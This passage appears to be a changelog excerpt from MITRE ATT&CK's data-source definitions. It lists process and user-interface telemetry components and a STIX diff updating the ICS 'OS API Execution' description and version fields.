Description: The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)


Process: Process Metadata

Current version: 1.0

Description: Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.


Process: Process Termination

Current version: 1.0

Description: Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)


Application Vetting: Protected Configuration

Current version: 1.0

Description: Device configuration options that are not typically utilized by benign applications


User Interface: System Notifications

Current version: 1.0

Description: Notifications generated by the OS


User Interface: System Settings

Current version: 1.0

Description: Settings visible to the user on the device

ics-attack

Patches

Process: OS API Execution

Current version: 1.0


Old Description
New Description
t1Initial construction of a WMI object, such as a filter, const1Operating system function/method calls executed by a process
>umer, subscription, binding, or provider (ex: Sysmon EIDs 19 
>-21) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-03-30T14:26:51.806Z2023-04-21T15:41:36.287Z
descriptionInitial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)Operating system function/method calls executed by a process
x_mitre_attack_spec_version2.1.03.1.0